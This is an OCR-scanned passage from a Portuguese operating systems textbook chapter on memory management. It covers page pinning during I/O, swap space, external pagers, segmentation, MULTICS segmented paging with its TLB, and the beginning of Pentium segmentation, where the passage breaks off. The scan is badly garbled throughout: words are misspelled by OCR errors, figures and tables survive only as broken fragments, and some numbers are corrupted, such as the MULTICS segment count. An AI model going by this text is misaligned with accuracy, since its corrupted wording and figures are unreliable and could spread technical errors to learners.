ocorreu antes de poder reinicializar a cxecuęao da instru¬ 
ęao* Ć como se os projetisias de hardware fossem incapazes 
de resolver o problema e o iivessern deixado para os proje- 
tistas do sistema operacional resoiverem. Caras legais. 

3.6,41 Retencao de paginas na memória 

Embora neste capftulo nao tenhamos disemido mui- 
to acerca de E/S, o Falo de um computador ter memória 
virtual nao sigm łka quc nao haja E/S, Memória vinual e 
E/S imeragem de maneira sutil, Por exemplo, considere 
um processo que ten ha emitido u ma chama da a o sistema 
para ler dc algum arquivo ou dispositivopara um buffo rem 
sen espaęo de endereęamento. Enguanto o processo esta 
esperando quc a E/S seja completada, ele e suspenso e ou- 
tro processo entra cm exccuęao. Esse outro processo causa, 
entao, u ma falta de pa giną. 

Se o algoritmo de paginaęao e global, existe urna possi- 
bilidade pequena, mas nao nula, de que a pagina que con- 
tem o buffer de E/S soja escolhida para ser removida da 
memória. Se urn dispositivo de E/S estiver atualtnente na 
fasę de transferenria via DMA para aqnela pagina, sua re- 
moęao da memória fara com que unia parte dos dados seja 
escrita na pagina correta, e a outra parte, na nova pagina 
carregada na memória. Urna soiuęao para esse problema 
ć trancar as paginas envolvidas com E/S na memória, de 
modo que nao possani ser removidas, Essa aęao do sisle- 
ma operacional e muitas vezes denominada retenęao de 
pagina {pitming). Ouira soluęąo e fazer todas as uperaęoes 
dc E/S para buffers no mideo e, posteriormente, copiar os 
dados para as paginas do usuario* 

3-6-51 Memória secundaria 

Em nossa discussao de algoritmos de snbstituięao de pa¬ 
gina, vimos como nma pagina e seledonada para remoęao, 
Mas nao abordamos a localizaęao em disco onde a pagina 


descariada da memória e colocada. Yamos entao iratar de 
algumas das questoes relacionadas a o gerendaniemo de disco. 

O algoritmo mais simples para a alocaęao de espaęo em 
disco consiste na manutenęao de urna area de troca (swap 
area) em disco ou, ainda melhor quc isso, em um disco 
separado do sistema de arquivos (para balancear a carga de 
E/S). A maioria dos sistema s UNIX funriona dessa forma. 
Essa partięao nao tem um sistema de arquivos normal, o 
quc elimina os custos indiretos dc converter deslocamentos 
em arquivos para bloquear endereęos, Em vez disso, sao 
usados numeros de bloco relativos ao infcio da partięao em 
to do o processo. 

Quando o sistema operacional e inlcializado, essa area 
dc troca encontra-se vazia c e representada na memória 
como urna unita entrada conlendo sua localizaęao e scu 
ta manho. No esquema mais simples, q na udo o primeiro 
processo e Inicializado, reserva-se urna parte dessa area de 
troca, do Lamanlio desse processo, e a area de troca restante 
fka reduzida dessa quamkladc. Quando novos [irocessos 
sao imcializados, a eles tambem sao atribufdos pedaęos da 
area de troca de tamanhos iguais aos ocupados por cada um 
deles. A medida que os processos vao terminali do, sens espa- 
ęos cm disco sao gradativamentc Uberados. A area de troca 
em disco e gerenriada como urna lista de pedaęos disponf- 
veis. Algoritmos melhores serao discutidos no Capftulo 10. 

O endereęo da area de iroca de cada processo e mati- 
lido na tabela de processos. O calculo do endereęo para 
escrevcr urna pagina e simples; basta adidonar o desloca- 
mento da pagina deniro do espaęo de endereęamento vir- 
mal ao endereęo inicial da area de troca. Comudo, antes 
qtie um processo possa comeęar sua execuęao, a area de 
troca deve ser inicializada. Para isso, copia-sc o processo 
to do em sua area dc troca em disco, carregando-o na me¬ 
mória de acordo com a necessidade. Ou, ainda, pode-se 
carregar o processo todo na memória c rcmovc*lo para o 
disco quando necessario. 

No enianto, esse moddo simples aprcsenla um próbie- 
ma; os processos podcm aumentar de tamanho no decorrer 
de suas execuęoes. Embora o código do programa geral- 
menie tenha um tamanho fixo, a area de dados algumas 
vezes pode crescer, mas a area de pilha certamente cresce- 
ra. Consequememente, talvez seja melhor reservar areas 
de troca separadas para código, dados e pilha e permitir que 
cada unia delas consista cm mais de um pedaęo cm disco. 

O outro extremo consiste em nao alocar nada arite- 
ripadamenie e apenas alocar o espaęo em disco para cada 
pagina ąuando da for cimada para la e liberar o mesmo 
espaęo ąuando a pagina for carregada na memória* Dessa 
maneira, os processos na memória nao ficam amarrados 
a nenhuma area especifica de troca. A desvantagem e a 
necessidade dc manier na memória o endereęo de cada pa¬ 
gina armazenada em disco, Em outras palavras, ć predso 
haver nma tabela para cada processo dizendo onde se en- 
contra cada urna dc suas paginas em disco. As duas alterna- 
tivas sao mostradas na Figura 3,27, 







Sl14t1N366 


Capitulo 3 Cerenciamento de memórta 143 


Memória principal 


Disco 



Memória principal 


Disco 



| Figura 3.27 (a) Paginaęao para Lima area de troca estśtica (b) Recuperando pśginas dinamicamenie. 


A Figura 3.27(a) ilustra u ma tabela de paginas com 
oito paginas. As paginas 0, 3, 4 e 6 estao na memória Prin¬ 
cipal. As paginas I, 2, 5 e 7 estao eni disco. A area de iroca 
em disco e tao grandę quamo o espaęo de endereęamento 
yirtual do processo (oito paginas); cada pa giną tem uma lo- 
calizaęao fixa r para ondc ela e recscrita ąuando e removida 
da memória prmdpal O calculo desse endereęo reąucr o 
coohccimcnto apenas do endereęo dc ondc a area de pagi¬ 
naęao do processo comcęa, visto que as paginas sao arma- 
zenadas de modo configu o e na mesma ordem dos nume- 
ros das parnas vinttais. As paginas presentes na memória 
sempre tern uma cópia de sombra em disco, mas essa cópia 
pode estar desatualizada se a pagina liver sido modifkada 
des de seu carregamento na memória. As paginas sombrea- 
das na memória indicam paginas ausentes da memória, e 
as paginas sombreadas no disco sao (em principia) subsii- 
tiudas pclas cópias na memória, embora a cópia cm disco 
possa ser u sad a caso a pagina cm memória tenha dc ser 
cnviada novamenie ao disco c nao tenha sido modifkada 
desdc qtic fot carregada. 

Na Figura 3.27(b), as paginas nao tem endereęos lixos 
em disco, puando uma pagina e levada para disco, uma 
pagina vazia em disco e escolhida livremente e o mapa do 
disco (quc tem espaęo para um endereęo de disco por pagi¬ 
na virtual) ó atualizado. As paginas que estao na memória 
nao tćm cópia cm disco; su as entradas no mapa do disco 
contem um endereęo de disco inva!ido ou um bit quc mdi- 
ca que das nao estao em uso, 

Nem sempre e poss(vel ter uma partięao de area de tro¬ 
ca fixa. Por exemplo, pode ser que nao haja nenhuma par- 
tięao de disco dispomvel. Nesse caso, um ou mais arquivos 
prc-alocados denlro do sistema de arquivos normaI podem 
ser usados. O Windows usa csse metodo* Entrctanto, uma 
otimizaęao pode ser usa da aqui para reduzir a quantidade 
de disco necessaria. Uma vez que o lexio do próg rama de 
cada processo vem de algnm arquivo (executavel) no sisie- 


ma de arqiiivos f o arquivo executavel pode ser usado como 
area de troca. Mais do que isso, visto que o texto do pro- 
grama em geral e somente para leitura, quando a memória 
esta cheia e paginas do programa tem de ser removidas da 
memória, das sao apenas dcscartadas e lidas novamente a 
partir do programa exccutavcl quando necessario* As biblio- 
tecas compartilhadas tambem podem fundonar desse modo, 

3.6.61 Separacao da politica e do 
mecanismo 

Uma ferramenta importante para gerendar a comple- 
xidade de qualquer sistema e separar a politica do meca¬ 
nismo. Esse princfpio pode ser aplicado ao gerenriameoto 
de memórta fazendo com que muitos dos gci enciadores dc 
memória sejam ex ecu ta dos como proccssos no nfvcl do 
usuario, Essa separaęao foi fetta primeiro no Mach (Yming 
et al., 1987). A discussao a seguir e ligeiramente baseada 
no Mach. 

A Figura 3.28 traz um exempio simples de como a po- 
iftica e o mecanismo podem ser separados. Aqui o sistema 
de gerenciamento de memória e dividido em tres partes: 

L Um manipulador dc MMU de babio ntvel. 

2. Um manipulador de falta de pagina que faz parte do 
nudeo* 

3. Um paginador externo executado no espaęo do 
usuario, 

Todos os detalhes dc como a MMU trabalha sao escon- 
didos em seti manipulador, que possui código dependente 
dc maquina, dcvendo ser rcescrito para cada tiova piata- 
forma que o sistema operacional executar. O manipulador 
de falta dc pagina ć um código independente de maąuina c 
comem a maioria dos mecanismos para paginaęao. A polf- 
lica e em grandę parte determinada pelo paginador exier- 
no, quc execma como um processo do usuario. 
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Espaęo 
do usuario 


Espaęo 
do nOdeo 



Figura 3.28 Tratamento de falta de p&gina com um paginador externo, 


Quatido um processo e inirializado, o paginador ex- 
teruo e notificado para aj usta r o mapa de paginas do pro¬ 
cesso e, se necessario, alocar urna area de troca no disco, 
A medida que o processo executa, ele pode rnapear novos 
obje to.s em seu espaęo de endereęamento, de modo que o 
paginador exicmo seja notificado novamenie* 

Urna vez que o processo inicie a execuęao ( cle pode 
causa r u ma falta de pagina. O rrtanipulador de faltas calcu la 
qual pagina virtual e necessaria e a envia para o paginador 
extemo H informando qua! e o problema. O paginador ex- 
terno cni a o le a pagina necessaria do disco c a copia para 
urna poręao de seu próprio espaęo de endereęamcmo* Com 
isso, de diz ao tratador de faltas on de a pagina esta. O tra- 
tador dc faltas remove o mapcamcnto da pagina do espaęo 
dc endereęamento do paginador cxtcrno c solkrta ao ma- 
nipulador de MMU quc coloque a pagina no local correto 
dentro do espaęo de endereęamento do usuario. O proces¬ 
so do usuario pode, entao, ser reinicializado. 

Hssa implcmcntaęao dcixa livrc o local onde oalgoritmo 
dc substituięao de pagina c colocado. Seria mais limpo te-lo 
no paginador externo f mas existem alguns problemas com 
esse esąuema, O prindpal deles e que o paginador ex terno 
nao tein acesso aos bits R e M de lodas as paginas. Hsses 
bits ditam regras em muitos dos algorilinos de paginaęao. 
Assim, on alguni mecanismo e necessario para passar essa 
informaęao para o paginador cxterno ou o algoritmo de 
substituięao deve estar no niicleo do sistema operarional. 
No segundo caso, o manipulador dc faltas diz ao pagina¬ 
dor cxtcrno qnaJ pagina de sdcdonou para a rcmoęao c, 
etitao, passa os dados, mapę and o-os no espaęo de endere¬ 
ęamento do paginador externo ou mcluindo-os em urna 
mensagem, Em qualquer metodo, o paginador externo es- 
creve os dados no disco, 

A vantagem prindpal dessa impiementaęao e permi- 
tir um código mais moduiar e com maior flcxibiMade. A 
Principal desvanLagem e a sobrecarga adidonal causada 
pelos diversos chaveamentos entre o nudeo e o usuario 


e a sobrecarga nas irocas de mensagens entre as parłeś do 
sistema* Por cnquanto, oassunto e allamente controverso, 
mas, como os computadores se tor nam ca da dia mais rapi- 
dos e os programas cada vez mais complexos, em urna exe- 
cuęao de mora da, o sacnffcio de algum desempenho para 
a u me mar a confiabiUdadc dos programas provavclrnente 
sera accitavel para a maioiia dos programadores, 

| fl Segmentaęao _ 

A memoria virtual discutida a te agora ć umdimensio- 
nal porque o endereęamento virtual vai de 0 a algum en- 
dercęo maximo r um após o outro. Para muitos problemas, 
ter dois ou mais cspaęos dc endereęamento separados pode 
ser muito meihor do que ter somerne um. Por exemplo, 
um compilador tern muitas tabclas constrmdas cm tempo 
de compilaęao, pos$ivdmeme induindo: 

I * O código-fonte sendo salvo para impressao (cm sis- 
temas em lote). 

2. A tabela de sfmbolos que contem os no mes e os atri- 
butos das variavcis. 

3, A tabela com todas as constantes usadas, imelras e 
em ponto flutuante. 

4 h A arvorc simatiea, que contem a anal ise sima lica do 
progrania. 

5. A pilha usada pełas drama das de rotiua dentro do 
compilador, 

Cada urna das piimeiras ąuatro tabelas tresce continua- 
mente quando a compdaęao prossegue. A ultima cresce e 
diminui de modo imprevisfvel d u ran te a com pil a ęa o, Em 
urna memoria unidimensional, essas cinco tabelas teriam 
de ser alocadas em regioes contiguas do espaęo de ende- 
reęamento virtual, como se pode observar na Figura 3.29. 

Im a ginę o que ocorre se um programa tern um nume¬ 
ru excepcionalmente grandę de variavei$, mas urna quan- 
lidade normal de todo o restante, A regiao do espaęo de 
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Espaęo de endereęamento yirtuai 


Espaęo de 
endereęamento 
alocado para a 
arvore sintatica 


PMha de chamada 



Tabela constante | 


código-lorrte 


Tabela de 
simbolos 


.. 


| Livre 

1 Espaęo atualmente 
i usado pela &rvore 
I sintśtica 


Tabela de simbolos 
[■ atingiu a tabela do 
J texto-fonte 


I Figura 3.29 Em um espaęo de endereęamento 

unidimensionat com tabelas crescentes, urna tabela podera 
atingiroutra. 


endereęamento alacada para a tabela de sfmbolos pode sc 
esgotar, mas ialvez existam variasenLradas Iivres nas outras 
tabelas. Obviamente, o compilador poderia simplesmente 
emitir uma mensagem que informasse que a compilaęao 
na o continuaria cni virtude da grandę quantidade de 
variaveis P mas essa atitudc na o parcce muito interes- 
santc, pois sc sabe que existem espaęos na o ulilizados 
nas out ras ta bela s. 

Outra possibilidade e imiur Robin Hood, tirando espa¬ 
ęo das tabelas com execsso dc emradas livres o dando para 
as tabelas com poucas emradas livres. Esse entrdaęamcmo 
pode ser feito, mas e como gerenciar os próprios sobrepo- 


sięoes — um incómodo, na melhor das liipóteses; na piór 
delas, urn trabalho ingrato e tedioso. 

O que e realnienie necessario e uma maneira dc I3vrar 
o programador da obrigaloriedade dc gerenciar a expamao 
e a comraęao de tabelas, do mesmo modo que a memória 
viriital elimina a preocupaęao de organizar o programa em 
sobreposięóes* 

Uma soluęao cxtrcmamcnte abrangcmc c dircta ć 
prover a maqnjna com muitos cspaęos dc endereęamento 
comptetameme independent es, chamados de segmentos. 
Gada segmemo e consiiimdo de uma seąuenda linear de 
endereęos, de 0 a algum maximo. 0 tamanho de ca da 
segment o pode ser qualquer um, de 0 ao maximo permi- 
lido* Segmentos diferentes podem ter diferenies tamanhos 
(e geralmente e o que ocorre). Alern disso, os tamanhos 
dos segmentos podem variar durante a cxeoięao. O tama- 
nho dc cada segmemo dc pil ha e passivcl dc ser cxpandido 
sempre que algo c colo ca do sobie a pilha e diminuido loda 
vez que algo e retirado de!a. 

Pdo £ato dc cada segmento constituir um espaęo de en- 
dereęamcnto separado, segmentos diferentes podem crcsccr 
ou red Lizie independeniemerue, sem afetarem ttns aos ou- 
tros. Se uma pilha, em certo segmemo, precisa de mais espa¬ 
ęo de endereęamento para crcsccr, ela pode te-lo f pois nao 
exisle nada em seu espaęo de endereęamento capaz de co- 
lidir com ela. E óbvlo que um segmento pode ser totalmen- 
te preenchido, mas geralraenie os segmentos sao grand es e 
esse tipo dc ocoiTenda e raro, Para cspcdficar um endereęo 
nessa memória segment a da e bidinicnsional, o programa 
deve fornecer um endereęo composto de duas partes: um 
nu mero do segmento e um endereęo demro do segmento. A 
Figura 3.30 ilustra uma memória segmentada sen do usada 
pelas tabelas do compilador dlsoitidas anteriormente. Cinco 
segmentos mdependenics sao mostrados aqul 
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| Figura 3.30 Uma memória segmentada permie que cada tabela cresęa oo encolha de modo independente das out ras tabelas. 
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t preciso enfatizar que um segment o e utną entidade 
lógica, que o programador conhece e usa como entidade ló¬ 
gica. Um segmento pode conter uma rotina, um arranjo, 
uma pilha ou um conjumo de variavds escalarcs, mas em 
geral e!e nao apresenta uma rmstura de diferentes tipos. 

Uma memória segmentada tern outras vamagens alem 
de simpliJtcar o tratamemo das estruturas dc dados quc es- 
tao crescendo ou se reduzindo. Se ca da rotina ocupa um 
segmento sępa rad o, com o endereęo 0 como endereęo 
i nicią I, a ligaęao das roli nas compiladas separadamente e 
extremamente simpMcada, Após lodasas rotinas consti- 
luimes dc um programa terem sido compiladas e ligadas, 
uma chamada para uma rotina no segmento n usara o 
endereęo de duas partes {n, 0) para endereęar a palavra 0 
(o ponto de entrada). 

Se a rotina no segmento nt posteriormenie modificada 
e recompilada, nenhuma outra rotina precisa ser alierada 
(pois nenhum endereęo inidal foi modificado), mesnio se a 
no va versao Eor ma lor do que a primcira* Com uma memó- 
ria unidimcnsional, as rotinas sao fortemente empacotadas 
próximas u mas as outras, sem qualqucr espaęo dc cndcrc- 
ęamento entre das. Conseąucntemente, a variaęao do ta¬ 
ma lilio de uma rotina pode a feta r os endereęos iniciais das 
outras rotinas (nao rdadonadas). Isso, porsua vez, reąucr 
a modificaęao de todas as rotinas que fazem chamadas as 
rotinas que foram movidas, a firn de autalizar sens novos 
endereęos iniciais. Se um programa contem centenas de 
rotinas, esse processo pode ser dispendioso. 

A segmentaęao tambem lad li ta o companilhamcnto 
de rotinas ou dados entre varios processos. Um exemplo 
comrnii e a bibliotece compartiihada, Muitas vezes, as estaęoes 
de trabalbo modernas, que executam sistemas avanęados de 
janelas, tern bibliotecas graficas extremamente grandes 


compiladas em quase todos os pr ogra mas. Em um sistema 
segment a do, a bibiioteca grafie a pode ser colo ca da em um 
segmento e compartilliada entre varios processos, elimi- 
nando a neccssidade de sua replicaęao em ca da cspaęo de 
endereęamento dc ca da processo, Apesar de ser possfvel 
havci bibliotecas compartilhadas em sistemas dc paginaęao 
ptira, essa situaęao e muito rtiais complicada. Port ant o, es- 
ses sistemas preferem simular a segmentaęao. 

Como cada segmento forma uma entidade lógica da 
qital o programador esta ciente — como uma rotina, um 
arranjo ou uma pilha — diferentes segmentos podem pos- 
suir diferentes tipos de proteęao, Um segmento de rotina 
pode ser espedfteado como somente para execuęao, o que 
profbe tentativas de leitura ou escrita nele. Um arranjo de 
ponto flutuante pode ser especificado como leitura^escrita, 
mas nao de cxetuęao, e, assim, as temativas de execuęao 
scrao capturadas. Essa proteęao e ii li! na captura de erros 
de program a ęa o. 

E preciso comprcender por que a proteęao faz sentido 
em uma memória segmentada, mas nao em uma memória 
unidimensional paginada: em uma memória segmentada, 
o u su ario esta cienie do que existe em cada segmento. Nor¬ 
malnienie, um segmento nao contem uma rotina e urna 
pilha, por excmplo, mas ou um ou outro. Visto que cada 
segmento contem somente um tipo dc objęto, o segmento 
pode tera proteęao apropriada para aqudc lipocspccifico. 
A paginaęao e a segment aę<i o sao comparadas na Tabela 3.3, 

De certo modo, os conteudos de urna pa giną sao aci- 
demais. O programador desconhece o fato de que a pagi¬ 
naęao esta ocorrendo. Em bora fosse posstvel colocar alguns 
bits em cada entrada da tabela de paglnas, a firn de espe- 
cificar o acesso permitido, para milizar essa propriedade 
o programador devcria man ier o eontrole dc on de estao 


Consideraęao 

Paginaęao 

Segmentaęao 

0 programador precisa saber que essa tecnica esta sertdo osada? 

Nao 

Sim 

Ha quantos espaęos de endereęamento finear? 

1 

Muitos 

0 espaęo de endereęamento total pode superar o tamanho da 
memória fisica? 

Sim 

Srm 

Rotinas e dados podem ser distinguidos e protegidas 
separadamente? 

Nao 

Sim 

As tabelas cujo tamanho flutua podem ser facilmente 
acomodadas? 

Nao 

Sim 

0 compartilhamento de rotinas entre os usuarios e facilitado? 

Nao 

Sim 

Por que essa tścnica foi inventada? 

Para obter um grandę 
espaęo de endereęamento 
linear sem a necessidade 
de comprar majs menrtóna 
fEstca 

Para permitir que próg ram as e 
dados sejam divididos em espaęos 
de endereęamento logicamente 
Independentes e para auxiliar o 
compartilhamento e a proteęao 


] Tabela 3.3 Cofnparaęao entre paginaęao e segmentaęao. 
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os limites da pa gin a em sen espaęo de endereęamento. A 
paginaęao foi inventada, predsamente, para eliminar esse 
tipo dc admimsiraęao* Como o usuario de u ma memoria 
seginentada tem a ilusao de que todos os segmentos es- 
tao na meniória principal durante todo o tempo — isto ć, 
cle e capaz de endereęa-los como se eles ai estivessem — r de 
pode proteger ca da segmento separadaniente, sem ter de 
se preocupar com a admirustraęao de su a sobreposięao. 

3.7.1 I implementacjo de segmentaęao pura 

A implenientaęao da segmentaęao dilere da paginaęao 
em um ponto essencial: as paginas tern tamanhos fixos e os 
segmentos, nao. A Figura 331 (a) mostra um exemplo de 
memoria fis i ca que contem inidalmenle cinco segmentos. 
Agora imagine o que ocorre se o segmento I e removido e 
o segmemo 7, me nor, e colocado em seu lugar. Ciicgarc- 
mos a cojifigtiraęao de memoria da Figura 3.31 (b)* Entre 
o segmento 7 e o segmentu 2 existe uma area nao iisada — 
isto e, uma lacuna, O segmemo 4 e substituido pelo seg- 
menio 5, como na Figura 3.3i{c), e o segniento 3 e substi- 
tufdo pelo segmemo 6, como ilustra a Figura 3.31 (d). Após 
o sistema ter executado por um tempo, a meniória estara 
dMdida cm regioes, a Ig uma s com segmentos e o u tras com 
lacunas. Esse fenómeno, cliamado de fragmentaęao ex- 
tema (ou eheckerboarcliiig), desperdięa memoria nas 
lacunas. Isso pode ser san a do com o uso de co nipa eta ęa o, 
como mostra a Figura 3.31 (e}. 

5-7-2 I Segmentacjo com paginacjo: 
MULTIC5 ' 

Se os segmentos sao gran des, talvez seja incon ye¬ 
ti ieme — ou mesmo inipossfvel — mante-los na memoria 
em sua totalidade. Isso gera a ideia de paginaęao dos seg¬ 
mentos, de modo que somente as paginas realnienie ne- 
cessarias tenhani de estar na mcmória* Yarios sistemas im- 
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portanfes tern suportado segmentos paginados. Nesta seęao 
descreveremos o primeiro deies: o MULTICS. Na próxima 
seęao, trataremos de um mais reccntc: o Pentium, da Intel. 

O MULTICS foi execmado em maąuinas Honeywel! 
6000 e sens descendentes e provia de cada programa uma 
memória virtua) tle atc 2 ls segmentos {mais do que 250 
mil), na qua) cada segmento poderia ter atc 65.536 {36 bits) 
palavrasde comprimento. Para implemema-lo, os projetis- 
las do MULTICS optaram por tratar cada segniento como 
uma memória virtual e, assim, pagina-lo, combinando as 
vantagens da paginaęSo (tamanho uniforme de paginas 
seni necessidade de mant er o segmento todo na memória 
no caso de somente parte dele estar sendo usado) com 
as vantagens da segmentaęao (fadlklade de programaęlo, 
modularidade, proteęaoe companithamemo)* 

Cada programa no MULTICS tern uma tabela de segmen¬ 
tos, com um descritor para cada segmento. Yisto quc po- 
tencialmenie existe mais do que um ąuarlo de milhao de 
emradas na tabela, a tabela de segmentos forma, por si só, 
um segmento, que tambem e paginado, Um descritor de 
segmento informa se o segmento se encontra ou nao na 
memória principal. Se qualquer parte do segmento esta na 
memória, considera-se que o segmemo esta na memória e 
que sua tabela dc paginas tambem estara* Se o segmen- 
to esta na memória, seu descritor contem um ponteiro de 
18 bits para sua tabela de paginas (veja a Figura 3.32(a)). 
Como o endereęamento ffsico e de 24 bits e as paginas sao 
aiinhadas em limites dc 64 bytes (o que implica que os 6 
bits de mais baixa ordem dos endereęos das paginas sejam 
000000), apenas 18 bits sao necessarios no descriLor para 
armazenar um endereęo da tabela de paginas* O descritor 
tambem pode comer o tamanho do segmento, os bits de 
proteęao e alguiis outros itens. A Figura 3.32(b) ilustra um 
descritor de segmemo do MULTICS. O endereęo do segmen¬ 
to na memória secimdaria nao esta no descritor do seg- 
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| Figura 3*31 (a)-(d) DeseńvoJvimento de checkerboarding. (e) Remoęao do checkerboarding por compactaęao. 
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mento, mas em outra tabela usada pelo manipulador de 
falias de segmento. 

Cada segmento e mu espaęode endereęaniemo virmal 
comuin, sendo tambem paginado do mesmo modo que a 
memória paginada nao segmeniada descrita ameriormeme 
neste capftulo, O tamanho de uma pagina normal e L024 
pal a v ras (embora alguns po u cos segmentom peąuenos u$a- 
des pdo próprio MULTICS nao sejam paginados ou sejam 


paginados em unidades de 64 palavras para economizar 
memória ffsica). 

Um endereęo no MULTICS consistc de duas partes; o 
segmento e o endereęo dentro do segmento, O endereęo 
dentro do segmento e, por sua vez, diyidido em duas par¬ 
tes; um nu mero de pagina e uma palavra dentro da pagina, 
como mostra a Figura 3.33. Quando ocorre uma referenda 
a memória, o seguinte algoritmo e executado: 


36 bits 


Descritor de segmento 6 


Descritor de segmento 5 


Descritor de segmento 4 


Descritor de segmento 3 


Descritor de segmento 2 


Descritor de segmento 1 


Descritor de segmento 0 


Segmento de descritor 


I 


Entrada da pógina 2 


Entradada pagina 1 


Entrada da pógina 0 


Tabela de paginas para 
o segmento 3 


i 


Entrada da pagina 2 


Entrada da pagina 1 


Entradada pagina 0 


Tabela de pdginas 
para o segmento 1 


(a) 


18 

9 

1 

i 

i 

3 

3 

Endereęo de memória 
Principal da tabela de pśginas 

Comprimento do 
segmento (em póginas) 



1 




Tamanho da pagina: 

0 = 1024 pa!avra$- 

f = 64 palavras 

0 = segmento estś paginado 
t = segmento nao estó paginado 

Bits diversos - 

Bits de proteęao - 

(b) 

Figura 3.32 Memória virtuai MULTICS. (a) O descritor de segmento aponta para tabetas de póginas. (bl Um descritor de segmento. 
I Os numeros s3o o comprimento do campo. 


Endereęo dentro 
do segmento 


Numero do segmento 
18 


Numero 

Deslocamento 

da pógina 

dentro da pógina 

6 

10 


| Figura 3.33 Um endereęo virtual MULTICS de 34 bits. 
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1. O numero do segmento e usado para encontrar o 
descritor do segment o. 

2. Faz-se urna verificaęao para ver se a tabela de pa^ 
ginas do segmento esta na memória. Se a tabela de 
paginas esta na memória, cla e localizada. Do con¬ 
tr ario, ocorrc lima falta dc segmento, Sc cxistc urna 
yiolaęao de proteęao, ocorrc urna interrupęao. 

3. A entrada da tabela de paginas para a pa giną virtual 

rcąuisitada e examinada. Se a pagina nao esta na 
memória, ocorrc u ma falta de pagina. Se ela esta 
na memória, o endereęo da memória principal do 
inicio da pagina e traf do da cnirada da tabela 

de paginas. 

4. O dcslocamento e adicionado ao inicio da pagina a 
łim de gerar o endereęo da memória principal onde 
a palavra esta localizada. 
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5. A leitura ou a escrita pode finalmcnte ser feita. 

Esse processo e ii ust rado na Figura 3.34. Para siinplifi- 
ear, foi omitido o falo de que o segmento dc d esc mores de 
segmento e paginada, O que realnienie ocorrc c que um re- 
gistrador (registrador-basc do descritor) e usado para loca- 
Wiar a tabela de paginas do segmento de descritor es, a qual 
apoma para as paginas do segmento de descritores. Urna 
vez encontrado o descritor para o segmento neeessario, o 
endereęamento prossegue como mostrado na Figura 3.34. 

Como voce ja deve ter percebido, se o algoritmo an¬ 
tę rior fosse dc fato utilizado pclo sistema opcracional para 
ca da instruęao, os programas nao exetut aria m muito rapi- 
dameme. Na re a li da dc, o hardware do MULTICS rantem 
u ma TLB de alta vdocidadc, com ló palavras, que pode 
pcsąuisar todas as suas entradas cm paralelo para u ma 
dada chave* Essa TLB e i lustra da na Figura 3*35* Quando 
um endereęo c apresemado para o ramputador, o liard- 


Endereęo yirtual MULTICS 


Numero do segmento 


Numero da 
pśgina 

Desiocamento 


Numero 
do segmento 



Segmento da pógina 
do descritor 


Moldura da 
pagina 


Tabela de 
paginas 



Falavra 


Pagina 


Desiocamento 


| Figura 3,34 Conv-ers3o de um endereęo de duas partes do MULTICS em um endereęo de memória principal. 


Campo de 
comparaęao 


Esta entrada 
óusada? 


Numero do Pagina Moldura 

segmento virtual da pagina Proteęao Idade 


4 

1 

7 

Lailuratescrita 

13 

1 

6 

0 

2 

Somente leitura 

10 

1 

12 

3 

1 

Leiluratescrita 

2 

1 






0 

2 

1 

0 

Soinente 

7 

1 

2 

2 

12 

Sornente ełcecuęao 

9 

1 








| Figura 3*35 Versśo simplificada da TLB do MULTICS. A existencia de dois tamanhos de paginas torna a TLB real mais compiicada. 
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ware de endereęamento verifica inicialmente se o endereęo 
vinual csia na TLB, Em caso afirmativo, dc obtcm o nu me¬ 
ro da moldura de pagina dtretamente da TLB e forma o en- 
dereęo real da palavra referenda da sem precisar consultar 
o segmento de descritores ou a tabela de paginas. 

Os endereęos das 16 paginas mais reccntcmentc rcfc- 
renciadas sao mantidos na TLB, Os program as quc tiverem 
um conjunio de trabalho nie nor do que o tamanho da TLB 
atingiiao o eąuilfbrio com os endereęos de lodo o conjimto 
de trabalho na TLB e, portanto, executarao com eficiencia, 
Se a pagina na o esta na TLB, as tabela s de descritores e de 
paginas sao realinente acessadas para encontrar o endere- 
ęo da moldura de pagina e, assirn, a TLB e a tu a Li zada para 
incluir essa pagina, sendo descartada a pagina menos usada 
recentcmente. O campo Idade mantem o controle de qual 
entrada c a menos usada reccntcmentc. A TLB ć cmprcga- 
da para comparar paraldamcntc os numcros dc segmento 
e de pagina de todas as entradas. 

_HII Segmentacao com paginacao: o 
Pentium Intel 

Em muitos aspectos, a me moda virtuał no Pentium se 
parece com a do MULTICS, induindo a presenęa de segmen¬ 
tu cao e paginaęao. Enąuanto o MULTICS tem 256 K seg- 
mentos independentes, cada um com ale 64 K palavras dc 
36 bits, o Pentium possui 16 K segmentos independent es, 
cada um com ate um bilhao de palavras de 32 bits. Embo- 
ra o Pentium trabalbe com poucos segmentos, o tamanho 
do segmento rnaior e nutito mais importanie, pois poucos 
próg ra mas predsam de mais do que mil segmentos, mas 
muitos programas reąuerem segmentos grandes. 

O coraęao da memória virtual do Penitum consiste em 
duas tabelas, a LDT {kcal descńptor tabk — tabela de descri- 
tores 1 ocal) e a GDT (ghbnidesaiptor labie — tabela de des¬ 
critores global). Cada programa tem sua própria LDT, mas 
existe mm unica GDT, compartilhada por todos os progra¬ 
mas do computador A LDT descreve os segmentos locais a 
cada programa, induindo código, dados, pilha e assim por 
dianie, ao passo que a GDT dcscreve os segmentos do siste- 
ma, indusn e o próprio sistema operacional. 


Bits 13 12 



Para acessarum segmento, um programa Pentium car- 
rega primeiro um seletor para aquele segmento denlro de 
urn dos seis registradores de segmento da maquina. Dti¬ 
ra nte a exeaięao, o registrador CS guarda o seletor para 
cada segmento de código {codęsegment) e o registrador DS 
guarda o seletor para o segmento de dados {data segment). 
Os outros registrador es de segmentos sao menos importan- 
tes* Cada sektor e urn nu mero de 16 bits, como mostra a 
Figura 336* 

Um dos bits do sektor mforma se determinado segmen¬ 
to c local ou global (islo e, se ele esta na LDT ou na GDT)* 
Treze outros bits especificam o nu mero da entrada na LDT 
ou na GDT, de modo quc cada tabela pode center ate 8 K 
descritores de segmentos. Os outros dois bits (0 e l) rela- 
donam-sc a proteęao c serao abordados posteriormenie. 
O descritor milo (0) e pmibido. Ele pode ser seguramente 
carregado para um registrador de segmento para indicar 
quc nao esta atualmente disponfreL Ele causa unia inter- 
rupęao quando usado. 

No moment o em que um seletor e carregado para um 
registrador de segmento, o descritor correspondente e bus- 
cado da LDT ou na GDT e armazenado em registradores 
imernos do microprograma, de modo que possa ser accssa- 
do rapidamente. Um descritor e constitufdo de S bytes, in¬ 
duindo o endereęo-base do segmento, o tamanho e outras 
informaęÓes — como pode ser observado na Figura 3.37. 

O fermato do seletor fol cuidadosatnenie escolhido 
para facilitar a iocalizaęao do descritor de segmento. Pri¬ 
meiro, seledona-se a LDT ou a GDT, com base no bit 2 
do seletor. Entao, o seletor e copiado para um registrador 
provisório interno e os 3 bits de mais baixa ordem sao mar- 
cados com 0* Por firn, o cndercęo inicial da LDT ou da GDT 


